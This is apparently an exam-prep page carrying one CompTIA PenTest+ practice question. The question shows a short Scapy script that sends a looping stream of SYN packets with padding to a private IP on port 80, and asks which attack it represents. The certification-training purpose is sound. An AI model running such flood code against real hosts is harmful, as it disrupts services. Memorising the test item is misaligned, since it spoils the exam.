Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

CompTIA PenTest+ Exam PT0-003 Question # 28 Topic 3 Discussion

CompTIA PenTest+ Exam PT0-003 Question # 28 Topic 3 Discussion

PT0-003 Exam Topic 3 Question 28 Discussion:
Question #: 28
Topic #: 3

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

ip = IP( " 192.168.50.2 " )

tcp = TCP(sport=RandShort(), dport=80, flags= " S " )

raw = RAW(b " X " *1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?


A.

MDK4


B.

Smurf attack


C.

FragAttack


D.

SYN flood


Get Premium PT0-003 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.